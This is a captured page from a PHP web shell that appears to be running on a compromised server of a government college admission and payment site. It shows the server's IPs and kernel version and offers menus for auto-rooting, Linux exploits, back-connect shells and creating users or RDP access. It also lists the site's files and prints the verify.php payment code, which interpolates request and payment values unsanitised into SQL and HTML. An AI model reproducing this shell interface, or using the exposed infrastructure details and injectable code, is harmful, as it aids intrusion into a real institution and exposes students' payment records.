Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.15.3.17
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
gcg /
adm /
[ HOME SHELL ]
Name
Size
Permission
Action
admin
[ DIR ]
drwxr-xr-x
certificates
[ DIR ]
drwxrwxrwx
css
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
libs
[ DIR ]
drwxr-xr-x
plugins
[ DIR ]
drwxr-xr-x
razorpay
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
student_photos
[ DIR ]
drwxrwxrwx
tcpdf
[ DIR ]
drwxr-xr-x
upload
[ DIR ]
drwxrwxrwx
.DS_Store
7.99
KB
-rwxr-xr-x
MainPage.html
41.09
KB
-rwxr-xr-x
MainPage_dev.html
0
B
-rwxr-xr-x
MainPage_with_values.html
40.77
KB
-rwxr-xr-x
Notification.pdf
41.04
KB
-rwxr-xr-x
Registrationpage.html
6.29
KB
-rwxr-xr-x
Reprint.html
7.51
KB
-rwxr-xr-x
admission_sms_push.php
2.42
KB
-rwxr-xr-x
app.php
416
B
-rwxr-xr-x
cconfig.php
1.49
KB
-rwxr-xr-x
cronjob_sendsms.php
2.52
KB
-rwxr-xr-x
database.php
405
B
-rwxr-xr-x
direct-signin.php
886
B
-rw-rw-r--
feestr.pdf
33.42
KB
-rwxr-xr-x
forgot-password.php
2.19
KB
-rwxr-xr-x
forgotPassword.html
3.84
KB
-rwxr-xr-x
index.html
8.68
KB
-rwxr-xr-x
index_1.html
130
B
-rwxr-xr-x
instruction.html
10.31
KB
-rwxr-xr-x
instruction_10092018.html
8.37
KB
-rwxr-xr-x
instruction_24092018.html
9.08
KB
-rwxr-xr-x
instruction_regn.html
5.07
KB
-rwxr-xr-x
login.php
294
B
-rwxr-xr-x
registration.html
16.64
KB
-rwxr-xr-x
upload.php
393
B
-rwxr-xr-x
upload1.php
389
B
-rwxr-xr-x
upload_file.php
718
B
-rwxr-xr-x
verify.php
7.28
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : verify.php
<!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=Edge" /> <meta content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no" name="viewport" /> <title>GCG: Admission Panel</title> <!-- Favicon--> <link rel="icon" href="images/favicon.jpg" type="image/x-icon" /> <!-- Google Fonts --> <link href="https://fonts.googleapis.com/css?family=Roboto:400,700&subset=latin,cyrillic-ext" rel="stylesheet" type="text/css" /> <link href="https://fonts.googleapis.com/icon?family=Material+Icons" rel="stylesheet" type="text/css" /> <!-- Bootstrap Core Css --> <link href="plugins/bootstrap/css/bootstrap.css" rel="stylesheet" /> <!-- Waves Effect Css --> <link href="plugins/node-waves/waves.css" rel="stylesheet" /> <!-- Custom Css --> <link href="css/style.css" rel="stylesheet" /> <!-- AdminBSB Themes. You can choose a theme from css/themes instead of get all themes --> <link href="css/themes/all-themes.css" rel="stylesheet" /> </head> <body class="theme-cyan"> <!-- Page Loader --> <div class="page-loader-wrapper"> <div class="loader"> <div class="preloader"> <div class="spinner-layer pl-red"> <div class="circle-clipper left"> <div class="circle"></div> </div> <div class="circle-clipper right"> <div class="circle"></div> </div> </div> </div> <p>Please wait...</p> </div> </div> <!-- #END# Page Loader --> <!-- Top Bar --> <nav class="navbar"> <div class="container-fluid" style="color: #fff;"> <div class="col-md-12 m-t--5"> <center> <h2>GOVERNMENT COLLEGE(AUTONOMOUS), KALABURAGI</h2> </center> <center> <h3 class="m-t--5">Admission Panel</h3> </center> <a href="index.html" style="float: right;margin-top: -25px; font-size:16px;color: #fff;" >Home</a > </div> </div> </nav> <section class="content"> <div class="row clearfix"> <div class="container-fluid"> <div class="col-lg-10 col-md-10 col-sm-12 col-xs-12"> <div class="card p-l-20 p-r-20 p-b-100"> <div class="header"> <h3>GOVERNMENT COLLEGE(AUTONOMOUS), KALABURAGI</h3> </div> <div class="row clearfix" style="padding-top: 10%;padding-bottom: 3%;" > <?php require('razorpay/config.php'); include("/var/www/config.php"); @session_start(); require('razorpay/razorpay-php/Razorpay.php'); use Razorpay\Api\Api; use Razorpay\Api\Errors\SignatureVerificationError; $success = true; $error = "Payment Failed"; if (empty($_POST['razorpay_payment_id']) === false) { $api = new Api($keyId, $keySecret); try { // Please note that the razorpay order ID must // come from a trusted source (session here, but // could be database or something else) $attributes = array( 'razorpay_order_id' => $_SESSION['razorpay_order_id'], 'razorpay_payment_id' => $_POST['razorpay_payment_id'], 'razorpay_signature' => $_POST['razorpay_signature'] ); // var_dump($attributes); $api->utility->verifyPaymentSignature($attributes); //var_dump($api); } catch(SignatureVerificationError $e) { $success = false; $error = 'Razorpay Error : ' . $e->getMessage(); } } //pay_BM9pU1wNQgNrzY if ($success === true) { $html = "<p>Your payment was successful</p> <p>Payment ID: {$_POST['razorpay_payment_id']}</p>"; $paymentid = $_POST['razorpay_payment_id']; $api = new Api($keyId, $keySecret); $payment = $api->payment->fetch("{$paymentid}"); $servername = SERVERNAME; $username = USERNAME; $password = PASSWORD; $dbname = "logisys3_comexam"; $conn = new mysqli($servername, $username, $password, $dbname); $get_data = "select * from dbname where ifnull(fdeleted,'') <> 'T'"; $result1=$conn->query($get_data); if (mysqli_num_rows($result1) > 0) { // output data of each row $dbnames = array(); while($row = mysqli_fetch_assoc($result1)) { $dbnames[$row['FUNIVCODE']] = $row['FDBNAME']; } } mysqli_close($conn); $servername = SERVERNAME; $username = USERNAME; $password = PASSWORD; $dbname = $dbnames[$payment->notes->univcode]; $conn = new mysqli($servername, $username, $password, $dbname); $status = "success"; $productinfo = $payment->notes->appno; $txnid = $payment->id; $payment['TXNAMOUNT'] = ((float)$payment->amount/100); $firstname = 'razorpay'; $html = ""; echo "<h1 style='color:green;'>Thank You. Your order status is success</h1>"; echo "<h2>Your Transaction ID for this transaction is ".$txnid.".</h2>"; echo "<h3>We have received a payment of Rs. " . $payment['TXNAMOUNT'] ."</h3>"; $html=""; $button="<button style='font-size: 16px;font-weight: 600;' id='paytmBtn' type='button' class='btn btn-success waves-effect btn-lg' onclick = \"PrintApplicationFormpaytmNETBANKING('$productinfo')\">Print Application</button>"; echo $button; if(substr($productinfo, 0,1) == 5) { $update="update regcandsum set fpaymenttranid = '{$txnid}',fpaymenttranid = '{$txnid}', fpaymentstatus = 'success', fpaymentdate = now() where fappno ='{$productinfo}'"; }else { $update="update studadm set fpaymenttranid = '{$txnid}',fpaymenttranid = '{$txnid}', fpaymentstatus = 'success', fpaymentdate = now() where fappno ='{$productinfo}'"; } $result=$conn->query($update); } else { $html = "<p>Your payment failed</p> <p>{$error}</p>"; } echo $html; ?> </div> </div> </div> </div> </div> </section> <script src="js/MainPage.js"></script> <!-- Jquery Core Js --> <script src="plugins/jquery/jquery.min.js"></script> <!-- Bootstrap Core Js --> <script src="plugins/bootstrap/js/bootstrap.js"></script> <!-- Waves Effect Plugin Js --> <script src="plugins/node-waves/waves.js"></script> <script src="plugins/jquery-validation/jquery.validate.js"></script> <!-- Custom Js --> <script src="js/admin.js"></script> <!-- Demo Js --> <script src="js/demo.js"></script> <script type="text/javascript"> $(function() { $("li").click(function() { // remove classes from all $("li").removeClass("active"); // add class to the one we clicked $(this).addClass("active"); }); }); </script> </body> </html>
Close